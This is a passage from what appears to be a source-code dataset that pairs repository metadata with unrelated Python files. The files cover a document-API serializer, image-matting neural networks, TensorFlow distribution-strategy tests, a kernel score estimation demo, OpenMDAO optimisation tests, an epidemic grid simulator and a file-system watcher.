] | 14 | 2019-04-09T23:34:56.000Z | 2022-01-17T14:19:51.000Z | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
] | null | null | null | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
] | 4 | 2020-03-29T15:29:59.000Z | 2022-01-17T14:19:44.000Z | # -*- coding: utf-8 -*-
# created by inhzus
import dataclasses
from juq.serializer import *
class SerializerBuilder:
STR_CLASS_MAP = {
'v2.book': RepoSerializer,
'v2.book_toc': RepoTocSerializer,
'v2.book_detail': RepoDetailSerializer,
'v2.doc': DocSerializer,
'v2.doc_detail': DocDetailSerializer,
'v2.group_user': GroupUserSerializer,
**dict.fromkeys(('v2.user', 'v2.group'), UserSerializer),
**dict.fromkeys(('v2.group_detail', 'v2.user_detail'), UserDetailSerializer)
}
@staticmethod
def _gen_serializer(param: dict):
if '_serializer' not in param:
if 'body_html' in param:
param['_serializer'] = 'v2.doc_detail'
elif 'slug' in param:
param['_serializer'] = 'v2.book_toc'
else:
return None
serializer = SerializerBuilder.STR_CLASS_MAP[param['_serializer']]
field_names = set(f.name for f in dataclasses.fields(serializer))
candi = {k: None for k in field_names}
candi.update({k: v for k, v in param.items() if k in field_names})
return serializer(**candi)
@staticmethod
def build(param: dict):
data = param.pop('data')
if not isinstance(data, dict):
return [SerializerBuilder._gen_serializer(item) for item in data]
# data['abilities'] = param['abilities'] if 'abilities' in param else None
# data['meta'] = param['meta'] if 'meta' in param else None
data.update(param)
return SerializerBuilder._gen_serializer(data)
if __name__ == '__main__':
pass
| 33.571429 | 84 | 0.617629 |
5d8a318502396a8a6a524aa0f2c6a79a05fc153d | 6,961 | py | Python | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | 1 | 2021-02-12T13:19:45.000Z | 2021-02-12T13:19:45.000Z | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | null | null | null | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torchsummaryX import summary
from config import device, im_size
class conv2DBatchNormRelu(nn.Module):
def __init__(
self,
in_channels,
n_filters,
k_size,
stride,
padding,
bias=True,
dilation=1,
with_bn=True,
with_relu=True
):
super(conv2DBatchNormRelu, self).__init__()
conv_mod = nn.Conv2d(int(in_channels),
int(n_filters),
kernel_size=k_size,
padding=padding,
stride=stride,
bias=bias,
dilation=dilation, )
if with_bn:
if with_relu:
self.cbr_unit = nn.Sequential(conv_mod, nn.BatchNorm2d(int(n_filters)), nn.ReLU(inplace=True))
else:
self.cbr_unit = nn.Sequential(conv_mod, nn.BatchNorm2d(int(n_filters)))
else:
if with_relu:
self.cbr_unit = nn.Sequential(conv_mod, nn.ReLU(inplace=True))
else:
self.cbr_unit = nn.Sequential(conv_mod)
def forward(self, inputs):
outputs = self.cbr_unit(inputs)
return outputs
class segnetDown2(nn.Module):
def __init__(self, in_size, out_size):
super(segnetDown2, self).__init__()
self.conv1 = conv2DBatchNormRelu(in_size, out_size, k_size=3, stride=1, padding=1)
self.conv2 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
self.maxpool_with_argmax = nn.MaxPool2d(2, 2, return_indices=True)
def forward(self, inputs):
outputs = self.conv1(inputs)
outputs = self.conv2(outputs)
unpooled_shape = outputs.size()
outputs, indices = self.maxpool_with_argmax(outputs)
return outputs, indices, unpooled_shape
class segnetDown3(nn.Module):
def __init__(self, in_size, out_size):
super(segnetDown3, self).__init__()
self.conv1 = conv2DBatchNormRelu(in_size, out_size, k_size=3, stride=1, padding=1)
self.conv2 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
self.conv3 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
self.maxpool_with_argmax = nn.MaxPool2d(2, 2, return_indices=True)
def forward(self, inputs):
outputs = self.conv1(inputs)
outputs = self.conv2(outputs)
outputs = self.conv3(outputs)
unpooled_shape = outputs.size()
outputs, indices = self.maxpool_with_argmax(outputs)
return outputs, indices, unpooled_shape
class segnetUp1(nn.Module):
def __init__(self, in_size, out_size):
super(segnetUp1, self).__init__()
self.unpool = nn.MaxUnpool2d(2, 2)
self.conv = conv2DBatchNormRelu(in_size, out_size, k_size=5, stride=1, padding=2, with_relu=False)
def forward(self, inputs, indices, output_shape):
outputs = self.unpool(input=inputs, indices=indices, output_size=output_shape)
outputs = self.conv(outputs)
return outputs
class DIMModel(nn.Module):
def __init__(self, n_classes=1, in_channels=4, is_unpooling=True, pretrain=True):
super(DIMModel, self).__init__()
self.in_channels = in_channels
self.is_unpooling = is_unpooling
self.pretrain = pretrain
self.down1 = segnetDown2(self.in_channels, 64)
self.down2 = segnetDown2(64, 128)
self.down3 = segnetDown3(128, 256)
self.down4 = segnetDown3(256, 512)
self.down5 = segnetDown3(512, 512)
self.up5 = segnetUp1(512, 512)
self.up4 = segnetUp1(512, 256)
self.up3 = segnetUp1(256, 128)
self.up2 = segnetUp1(128, 64)
self.up1 = segnetUp1(64, n_classes)
self.sigmoid = nn.Sigmoid()
if self.pretrain:
import torchvision.models as models
vgg16 = models.vgg16()
self.init_vgg16_params(vgg16)
def forward(self, inputs):
# inputs: [N, 4, 320, 320]
down1, indices_1, unpool_shape1 = self.down1(inputs)
down2, indices_2, unpool_shape2 = self.down2(down1)
down3, indices_3, unpool_shape3 = self.down3(down2)
down4, indices_4, unpool_shape4 = self.down4(down3)
down5, indices_5, unpool_shape5 = self.down5(down4)
up5 = self.up5(down5, indices_5, unpool_shape5)
up4 = self.up4(up5, indices_4, unpool_shape4)
up3 = self.up3(up4, indices_3, unpool_shape3)
up2 = self.up2(up3, indices_2, unpool_shape2)
up1 = self.up1(up2, indices_1, unpool_shape1)
x = torch.squeeze(up1, dim=1) # [N, 1, 320, 320] -> [N, 320, 320]
x = self.sigmoid(x)
return x
def init_vgg16_params(self, vgg16):
blocks = [self.down1, self.down2, self.down3, self.down4, self.down5]
ranges = [[0, 4], [5, 9], [10, 16], [17, 23], [24, 29]]
features = list(vgg16.features.children())
vgg_layers = []
for _layer in features:
if isinstance(_layer, nn.Conv2d):
vgg_layers.append(_layer)
merged_layers = []
for idx, conv_block in enumerate(blocks):
if idx < 2:
units = [conv_block.conv1.cbr_unit, conv_block.conv2.cbr_unit]
else:
units = [
conv_block.conv1.cbr_unit,
conv_block.conv2.cbr_unit,
conv_block.conv3.cbr_unit,
]
for _unit in units:
for _layer in _unit:
if isinstance(_layer, nn.Conv2d):
merged_layers.append(_layer)
assert len(vgg_layers) == len(merged_layers)
for l1, l2 in zip(vgg_layers, merged_layers):
if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
if l1.weight.size() == l2.weight.size() and l1.bias.size() == l2.bias.size():
l2.weight.data = l1.weight.data
l2.bias.data = l1.bias.data
class RefinementModel(nn.Module):
def __init__(self):
super(RefinementModel, self).__init__()
self.conv_1 = conv2DBatchNormRelu(4, 64, 3, 1, 1)
self.conv_2 = conv2DBatchNormRelu(64,64, 3, 1, 1)
self.conv_3 = conv2DBatchNormRelu(64,64, 3, 1, 1)
self.conv_4 = conv2DBatchNormRelu(64, 1, 3, 1, 1, with_bn=False, with_relu=False)
self.sigmoid = nn.Sigmoid()
def forward(self, inputs):
x = self.conv_1(inputs)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
x = torch.squeeze(x, dim=1)
x = self.sigmoid(x)
skip = inputs[:,3,:,:]
x = x + skip
return x
if __name__ == '__main__':
model = DIMModel().to(device)
summary(model, torch.Tensor(4, 4, 320, 320).cuda())
| 35.156566 | 110 | 0.591438 |
3c9e481eb32beede327227e8cfd4c2cb73a054d5 | 107 | py | Python | paranormal-pioneers/project/langs/forth/__init__.py | python-discord/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 76 | 2020-01-17T12:09:48.000Z | 2022-03-26T19:17:26.000Z | paranormal-pioneers/project/langs/forth/__init__.py | Hypertyz/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 17 | 2020-01-21T23:13:34.000Z | 2020-02-07T00:07:04.000Z | paranormal-pioneers/project/langs/forth/__init__.py | Hypertyz/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 91 | 2020-01-17T12:01:06.000Z | 2022-03-22T20:38:59.000Z | from project.langs.forth.forthimpl import create_forth, forth_compile, launch_repl
forth = create_forth()
| 26.75 | 82 | 0.831776 |
21f772022c4ddc7c10002db5adb9737e170442ba | 6,029 | py | Python | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from Matriz_esferica import Matriz_esferica
from Individuo import Individuo, Fabrica_individuo
import random
from itertools import permutations
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
class Simulador():
def __init__(
self,
tamanho_matriz, #numero de linhas e colunas da matriz esférica
percentual_inicial_tipo1, #percentual inicial da população que será infectada tipo 1
percentual_inicial_tipo2, #percentual inicial da população que será infectada tipo 2
chance_infeccao, #chance que um infectado tipo 2 tem de infectar um indivíduo saudável
chance_infeccao_tipo2, #chance de um indivíduo infectado se tornar contagioso
chance_morte, #chance de um indivíduo tipo 2 morrer ao fim de uma atualização
atualizacoes_cura): #número de atualizações necessárias para a cura de um indivíduo tipo 1 ou 2
self.num_atualizacoes = 0
self.individuos_infectados_tipo_2 = []
self.individuos_infectados_tipo_1 = []
self.individuos_infectados_curados = []
self.individuos_infectados_mortos = []
self.lista_matrizes_posicionamento = []
self.matriz_status = np.zeros([tamanho_matriz,tamanho_matriz])
self.fabrica_individuo = Fabrica_individuo(
chance_infeccao,
chance_infeccao_tipo2,
chance_morte,
atualizacoes_cura)
self.matriz_individuos = pd.DataFrame(columns=range(tamanho_matriz), index=range(tamanho_matriz))
self.matriz_individuos.loc[:] = self.fabrica_individuo.criar_individuo(Individuo.SADIO,(0,0))
self.matriz_status[:] = Individuo.SADIO
#objeto que é responsável por validar a movimentação no grid n x n
self.matriz_esferica = Matriz_esferica(tamanho_matriz)
self.populacao_inicial = int(tamanho_matriz**2)
self.num_inicial_tipo2 = int(self.populacao_inicial * percentual_inicial_tipo2)
self.num_inicial_tipo1 = int(self.populacao_inicial * percentual_inicial_tipo1)
self.num_inicial_sadios = self.populacao_inicial - (self.num_inicial_tipo2 + self.num_inicial_tipo1)
self.popular(tamanho_matriz)
dict = {
'num_sadios':self.num_inicial_sadios,
'num_infect_t1':self.num_inicial_tipo1,
'num_infect_t2':self.num_inicial_tipo2,
'num_curados':0,
'num_mortos':0}
#dataframe que guardará os resultados de cada atualização
self.dataframe = pd.DataFrame(dict, index = [0])
# self.salvar_posicionamento()
def get_status_individuo(self, individuo: Individuo):
return individuo.status
def get_status_coluna(self, serie: pd.Series):
return serie.apply(self.get_status_individuo)
def salvar_posicionamento(self):
self.lista_matrizes_posicionamento.append(self.matriz_individuos.apply(self.get_status_coluna).to_numpy())
self.lista_matrizes_posicionamento.append(self.matriz_individuos.apply(self.get_status_individuo))
def popular(self, tamanho_matriz):
#lista de possíveis combinações de índices da matriz de dados
permutacoes = permutations(list(range(tamanho_matriz)),2)
#conversão para lista de tuplas(x,y)
lista_indices = list(permutacoes)
#embaralhamento dos índices
random.shuffle(lista_indices)
#cria o primeiro tipo1:
ind_x = lista_indices.pop()[0]
ind_y = lista_indices.pop()[1]
self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_1,(ind_x,ind_y))
#self.matriz_individuos[ind_x, ind_y] = Individuo.INFECTADO_TIPO_1
self.individuos_infectados_tipo_1.append((ind_x,ind_y))
self.matriz_status[ind_x,ind_y] = Individuo.INFECTADO_TIPO_1
#cria o restante dos tipos 1
for i in range(1,self.num_inicial_tipo1):
ind_x = lista_indices.pop()[0]
ind_y = lista_indices.pop()[1]
self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_1,(ind_x,ind_y))
#self.matriz_individuos[ind_x, ind_y] = Individuo.INFECTADO_TIPO_1
self.individuos_infectados_tipo_1.append((ind_x,ind_y))
#cria o restante dos tipo 2:
for indice in range(self.num_inicial_tipo2):
ind_x = lista_indices.pop()[0]
ind_y = lista_indices.pop()[1]
self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_2,(ind_x,ind_y))
#self.matriz_individuos[ind_x, ind_y] = Individuo.INFECTADO_TIPO_1
self.individuos_infectados_tipo_2.append((ind_x,ind_y))
def get_status_individuo(self, individuo: Individuo):
return individuo.status
def mover_infectado(self, individuo: Individuo):
pos_x, pos_y = individuo.posicao[0], individuo.posicao[1]
pass
chance_infeccao = 0.3
chance_infeccao_tipo2 = 0.2
chance_morte = 0.2
atualizacoes_cura = 10
percentual_inicial_tipo1 = 0.01
percentual_inicial_tipo2 = 0.00
sim = Simulador(
10,
percentual_inicial_tipo1,
percentual_inicial_tipo2,
chance_infeccao,
chance_infeccao_tipo2,
chance_morte,atualizacoes_cura)
#print(sim.lista_matrizes_posicionamento[0])
print(sim.individuos_infectados_tipo_2)
print(sim.individuos_infectados_tipo_1)
#cmap = ListedColormap(['w', 'y', 'yellow', 'red'])
#plt.matshow(sim.matriz_individuos, cmap = cmap);plt.show();
| 39.927152 | 134 | 0.663958 |
31d74902903d8bc61abdb777c98ea4416f0edd60 | 8,117 | py | Python | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | 1 | 2019-09-15T09:42:06.000Z | 2019-09-15T09:42:06.000Z | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for testing DistributionStrategy descendants."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import reduce_util
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.training import optimizer
class _TestException(Exception):
pass
# May be the argument to either distribution.call_for_each_replica() or
# get_replica_context().merge_call()
def _raise_exception_fn(_=None):
raise _TestException()
# Must be the argument to a distribution.call_for_each_replica() call, calls a
# get_replica_context().merge_call() that raises an exception.
def _merge_raises_fn():
distribution_strategy_context.get_replica_context().merge_call(
_raise_exception_fn)
# Must be the argument to a get_replica_context().merge_call() call, calls
# dist.call_for_each_replica() with a function that raises an exception.
def _call_raises_fn(dist):
dist.call_for_each_replica(_raise_exception_fn)
# Must be the argument to a distribution.call_for_each_replica() call,
# calls a get_replica_context().merge_call() that calls a
# call_for_each_replica() that raises an exception.
def _merge_call_raises_fn():
distribution_strategy_context.get_replica_context().merge_call(
_call_raises_fn)
# Must be the argument to a get_replica_context().merge_call() call, calls
# dist.call_for_each_replica() with a function that calls a
# get_replica_context().merge_call() that raises an exception.
def _call_merge_raises_fn(dist):
dist.call_for_each_replica(_merge_raises_fn)
# Must be the argument to a distribution.call_for_each_replica() call, calls a
# get_replica_context().merge_call() that calls a call_for_each_replica() that
# calls a get_replica_context().merge_call() that raises an exception.
def _merge_call_merge_raises_fn():
distribution_strategy_context.get_replica_context().merge_call(
_call_merge_raises_fn)
class DistributionTestBase(test.TestCase):
"""Some tests that should work with any DistributionStrategy."""
def _test_minimize_loss_eager(self, d):
with d.scope():
l = core.Dense(1, use_bias=False)
def loss(x):
# TODO(josh11b): What if this constant was instead a captured
# value? Would it need to be a value that has been passed
# through d.broadcast()?
y = array_ops.reshape(l(x), []) - constant_op.constant(1.)
return y * y
# TODO(isaprykin): Extract implicit_grad+get_filtered_grad_fn into a
# common `implicit_grad` function and put it in DistributionStrategy.
grad_fn = backprop.implicit_grad(loss)
grad_fn = optimizer.get_filtered_grad_fn(grad_fn)
def update(v, g):
return v.assign_sub(0.2 * g)
one = d.broadcast(constant_op.constant([[1.]]))
def step():
"""Perform one optimization step."""
# Run forward & backward to get gradients, variables list.
g_v = d.call_for_each_replica(grad_fn, args=(one,))
# Update the variables using the gradients and the update() function.
before_list = []
after_list = []
for g, v in g_v:
fetched = d.read_var(v)
before_list.append(fetched)
# control_dependencies irrelevant but harmless in eager execution
with ops.control_dependencies([fetched]):
g = d.reduce(reduce_util.ReduceOp.SUM, g, destinations=v)
with ops.control_dependencies(d.update(
v, update, g, grouped=False)):
after_list.append(d.read_var(v))
return before_list, after_list
for i in range(10):
b, a = step()
if i == 0:
before, = b # pylint: disable=unbalanced-tuple-unpacking
after, = a # pylint: disable=unbalanced-tuple-unpacking
error_before = abs(before.numpy() - 1)
error_after = abs(after.numpy() - 1)
# Error should go down
self.assertLess(error_after, error_before)
def _test_minimize_loss_graph(self, d, soft_placement=False,
learning_rate=0.2):
config = config_pb2.ConfigProto()
config.allow_soft_placement = soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
with context.graph_mode(), \
ops.Graph().as_default(), \
self.cached_session(config=config) as sess, \
d.scope():
l = core.Dense(1, use_bias=False)
def loss(x):
# TODO(josh11b): What if this constant was instead a captured
# value? Would it need to be a value that has been passed
# through d.broadcast()?
y = array_ops.reshape(l(x), []) - constant_op.constant(1.)
return y * y
grad_fn = backprop.implicit_grad(loss)
def update(v, g):
return v.assign_sub(learning_rate * g)
one = d.broadcast(constant_op.constant([[1.]]))
def step():
"""Perform one optimization step."""
# Run forward & backward to get gradients, variables list.
g_v = d.call_for_each_replica(grad_fn, args=(one,))
# Update the variables using the gradients and the update() function.
before_list = []
after_list = []
for g, v in g_v:
fetched = d.read_var(v)
before_list.append(fetched)
with ops.control_dependencies([fetched]):
g = d.reduce(reduce_util.ReduceOp.SUM, g, destinations=v)
with ops.control_dependencies(d.update(
v, update, g, grouped=False)):
after_list.append(d.read_var(v))
return before_list, after_list
before_out, after_out = step()
variables.global_variables_initializer().run()
for i in range(10):
b, a = sess.run((before_out, after_out))
if i == 0:
before, = b
after, = a
error_before = abs(before - 1)
error_after = abs(after - 1)
# Error should go down
self.assertLess(error_after, error_before)
def _test_replica_id(self, d):
with d.scope():
expected_devices = [False] * len(d.worker_devices)
def mark_devices_fn():
replica_id = (
distribution_strategy_context.get_replica_context().replica_id)
self.assertLess(replica_id, len(d.worker_devices))
self.assertFalse(expected_devices[replica_id])
expected_devices[replica_id] = True
d.call_for_each_replica(mark_devices_fn)
self.assertAllEqual(expected_devices, [True] * len(d.worker_devices))
def _test_call_and_merge_exceptions(self, dist):
with dist.scope():
with self.assertRaises(_TestException):
dist.call_for_each_replica(_raise_exception_fn)
with self.assertRaises(_TestException):
dist.call_for_each_replica(_merge_raises_fn)
with self.assertRaises(_TestException):
dist.call_for_each_replica(_merge_call_raises_fn)
with self.assertRaises(_TestException):
dist.call_for_each_replica(_merge_call_merge_raises_fn)
| 37.929907 | 80 | 0.6957 |
e61eb819a6972dc05b4417e2c62e91fe48b9220a | 1,141 | py | Python | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | import sys
from django.core.management.base import BaseCommand
from erp.jobs.import_centres_vaccination import ImportVaccinationsCenters
def fatal(msg):
print(msg)
sys.exit(1)
class Command(BaseCommand):
help = "Importe les centres de vaccination COVID"
def add_arguments(self, parser):
parser.add_argument(
"--dataset-url",
type=str,
help="URL directe du jeu de données à importer",
)
parser.add_argument(
"--verbose",
action="store_true",
help="Afficher les erreurs",
)
parser.add_argument(
"--scheduler",
action="store_true",
help="Job: Execute et envoi un mail en fin d'opération",
)
def handle(self, *args, **options): # noqa
self.stdout.write("Importation des centres de vaccination")
try:
ImportVaccinationsCenters(options["scheduler"]).job(
dataset_url=options.get("dataset-url") or "",
verbose=options["verbose"],
)
except RuntimeError as err:
fatal(err)
| 27.166667 | 73 | 0.583699 |
160bf7f5d19b6e05d504df90bca7be9ea7214f03 | 2,489 | py | Python | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | 35 | 2020-05-21T16:55:32.000Z | 2022-03-25T02:54:11.000Z | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | null | null | null | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | 2 | 2021-06-14T21:32:57.000Z | 2021-06-29T18:29:13.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import seaborn as sns
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import argparse
import sys
import kscore
from .utils import *
def generate_data(n_samples):
theta = tf.random.uniform([n_samples], minval=3.0, maxval=15.0)
noise = tf.random.normal([n_samples, 2], stddev=np.exp(-1.0))
samples = tf.linalg.matrix_transpose([
-2.0 + 2 * theta * tf.cos(theta),
2 * theta * tf.sin(theta)
]) + noise
return samples
def main(args):
tf.compat.v1.set_random_seed(1234)
np.random.seed(1234)
kernel_width = 8.0
n_samples = args.n_samples
size, energy_size = 25, 300
lower_box, upper_box = -args.plot_range, args.plot_range
samples = generate_data(n_samples)
x = linspace_2d(size, lower_box, upper_box)
x_energy = linspace_2d(energy_size, lower_box, upper_box)
estimator = get_estimator(args)
estimator.fit(samples, kernel_hyperparams=kernel_width)
gradient = estimator.compute_gradients(x)
if 'curlfree' in args.kernel:
energy = estimator.compute_energy(x_energy)
else: energy = tf.constant(0.0)
with tf.compat.v1.Session() as sess:
samples, energy, gradient = sess.run([samples, energy, gradient])
# plot energy
if 'curlfree' in args.kernel:
plt.figure(figsize=(4, 4))
if args.clip_energy:
energy = clip_energy(energy, threshold=args.clip_threshold)
img = np.transpose(np.reshape(energy, [energy_size, energy_size]))
img = np.flip(img, axis=0)
plt.imshow(img, extent=[lower_box, upper_box, lower_box, upper_box])
# plot the score field
plt.figure(figsize=(4, 4))
plt.scatter(samples[:,0], samples[:,1], 2)
plot_vector_field(x, gradient)
plt.show()
if __name__ == "__main__":
sns.set()
sns.set_color_codes()
sns.set_style("white")
parser = argparse.ArgumentParser()
add_estimator_params(parser)
parser.add_argument('--n_samples', type=int, default=200, help='sample size.')
parser.add_argument('--plot_range', default=32, type=int)
parser.add_argument('--clip_energy', default=True, type=bool,
help='whether to clip the energy function.')
parser.add_argument('--clip_threshold', default=24, type=int)
args = parser.parse_args(sys.argv[1:])
main(args)
| 30.728395 | 82 | 0.682603 |
141914062467d4e7e29d5c548df2f0e66d757e0e | 3,145 | py | Python | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function, division, absolute_import
import unittest
from openmdao.devtools.testutil import assert_rel_error
from openmdao.api import Problem, ScipyOptimizer, ExecComp, IndepVarComp
from openmdao.test_suite.components.paraboloid import Paraboloid
class BasicOptParaboloid(unittest.TestCase):
def test_unconstrainted(self):
from openmdao.api import Problem, ScipyOptimizer, IndepVarComp
# We'll use the component that was defined in the last tutorial
from openmdao.test_suite.components.paraboloid import Paraboloid
# build the model
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 3.0)
indeps.add_output('y', -4.0)
prob.model.add_subsystem('paraboloid', Paraboloid())
prob.model.connect('indeps.x', 'paraboloid.x')
prob.model.connect('indeps.y', 'paraboloid.y')
# setup the optimization
prob.driver = ScipyOptimizer()
prob.driver.options['optimizer'] = 'COBYLA'
prob.model.add_design_var('indeps.x', lower=-50, upper=50)
prob.model.add_design_var('indeps.y', lower=-50, upper=50)
prob.model.add_objective('paraboloid.f_xy')
prob.setup()
prob.run_driver()
# minimum value
assert_rel_error(self, prob['paraboloid.f_xy'], -27.33333, 1e-6)
# location of the minimum
assert_rel_error(self, prob['indeps.x'], 6.6667, 1e-4)
assert_rel_error(self, prob['indeps.y'], -7.33333, 1e-4)
def test_constrained(self):
from openmdao.api import Problem, ScipyOptimizer, ExecComp, IndepVarComp
# We'll use the component that was defined in the last tutorial
from openmdao.test_suite.components.paraboloid import Paraboloid
# build the model
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 3.0)
indeps.add_output('y', -4.0)
prob.model.add_subsystem('parab', Paraboloid())
# define the component whos output will be constrained
prob.model.add_subsystem('const', ExecComp('g = x + y'))
prob.model.connect('indeps.x', ['parab.x', 'const.x'])
prob.model.connect('indeps.y', ['parab.y', 'const.y'])
# setup the optimization
prob.driver = ScipyOptimizer()
prob.driver.options['optimizer'] = 'COBYLA'
prob.model.add_design_var('indeps.x', lower=-50, upper=50)
prob.model.add_design_var('indeps.y', lower=-50, upper=50)
prob.model.add_objective('parab.f_xy')
# to add the constraint to the model
prob.model.add_constraint('const.g', lower=0, upper=10.)
# prob.model.add_constraint('const.g', equals=0.)
prob.setup()
prob.run_driver()
# minimum value
assert_rel_error(self, prob['parab.f_xy'], -27., 1e-6)
# location of the minimum
assert_rel_error(self, prob['indeps.x'], 7, 1e-4)
assert_rel_error(self, prob['indeps.y'], -7, 1e-4)
if __name__ == "__main__":
unittest.main() | 33.457447 | 80 | 0.652782 |
6556182cd762cff3d6af86ccd335d67cf4438847 | 1,821 | py | Python | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | 2 | 2021-04-21T15:22:23.000Z | 2021-05-12T01:45:43.000Z | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | null | null | null | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | null | null | null | import os
import time
from typing import Callable, List
from watchdog.events import FileSystemEventHandler, FileSystemEvent
from watchdog.observers import Observer
from .logger import logger
from .utils import get_dir_regex
from .types import SnapDirPrefixType
class FileEventHandler(FileSystemEventHandler):
def __init__(self, on_created: Callable[[FileSystemEvent], None] = None):
super().__init__()
self.on_created_callback = on_created
"""
def on_any_event(self, event):
print(event.event_type, event.src_path)
"""
def on_created(self, event):
print("on_created", event.src_path)
if self.on_created_callback: self.on_created_callback(event)
"""
def on_deleted(self, event):
print("on_deleted", event.src_path)
def on_modified(self, event):
print("on_modified", event.src_path)
def on_moved(self, event):
print("on_moved", event.src_path)
"""
def _add_schedule(observer: Observer, path: str, on_created: Callable[[FileSystemEvent], None]):
event_handler = FileEventHandler(on_created)
observer.schedule(event_handler, path, recursive=True)
def run_observer(work_dir: str, target_files: List[str], on_created: Callable[[FileSystemEvent], None]):
observer = Observer()
def _on_target_file_created(event: FileSystemEvent):
path = event.src_path
basename = os.path.basename(path)
print("test", path)
if os.path.isfile(path) and basename in target_files:
logger.info(f"Target file {basename} created")
on_created(event)
_add_schedule(observer, work_dir, _on_target_file_created)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
| 29.370968 | 104 | 0.695222 |
337ddae236738829f14eed3418d4a12fdf54477f | 194 | py | Python | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
] | null | null | null | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
